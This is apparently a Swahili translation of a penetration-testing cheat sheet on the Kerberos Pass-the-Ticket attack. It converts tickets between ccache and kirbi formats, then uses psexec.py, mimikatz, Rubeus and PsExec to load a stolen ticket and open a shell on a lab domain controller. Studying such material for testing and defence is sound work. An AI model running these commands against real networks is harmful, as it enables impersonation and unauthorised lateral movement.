Tumia Trickest kujenga na kutumia mifumo ya kazi kwa kutumia zana za jamii za juu zaidi ulimwenguni. Pata Ufikiaji Leo:

Pita Tiketi (PTT)

Katika njia ya kushambulia Pita Tiketi (PTT), wadukuzi wanateka tiketi ya uthibitisho wa mtumiaji badala ya nywila au thamani za hash. Tiketi hii iliyotekwa hutumiwa kujifanya kuwa mtumiaji, kupata ufikiaji usioruhusiwa kwenye rasilimali na huduma ndani ya mtandao.

Soma:

• Kuvuna tiketi kutoka kwa Windows

• Kuvuna tiketi kutoka kwa Linux

Kubadilisha tiketi za Linux na Windows kati ya majukwaa

Zana ya ticket_converter inabadilisha muundo wa tiketi kwa kutumia tiketi yenyewe na faili ya pato.

python ticket_converter.py velociraptor.ccache velociraptor.kirbi
Converting ccache => kirbi

python ticket_converter.py velociraptor.kirbi velociraptor.ccache
Converting kirbi => ccache

Shambulizi la Kupitisha Tiketi

Katika Windows Kekeo inaweza kutumika.

export KRB5CCNAME=/root/impacket-examples/krb5cc_1120601113_ZFxZpK
python psexec.py jurassic.park/trex@labwws02.jurassic.park -k -no-pass

#Load the ticket in memory using mimikatz or Rubeus
mimikatz.exe "kerberos::ptt [0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi"
.\Rubeus.exe ptt /ticket:[0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi
klist #List tickets in cache to cehck that mimikatz has loaded the ticket
.\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd

Marejeo

• https://www.tarlogic.com/blog/how-to-attack-kerberos/

Tumia Trickest kujenga na kutumia workflows kwa urahisi zinazotumia zana za jamii ya juu zaidi duniani. Pata Ufikiaji Leo: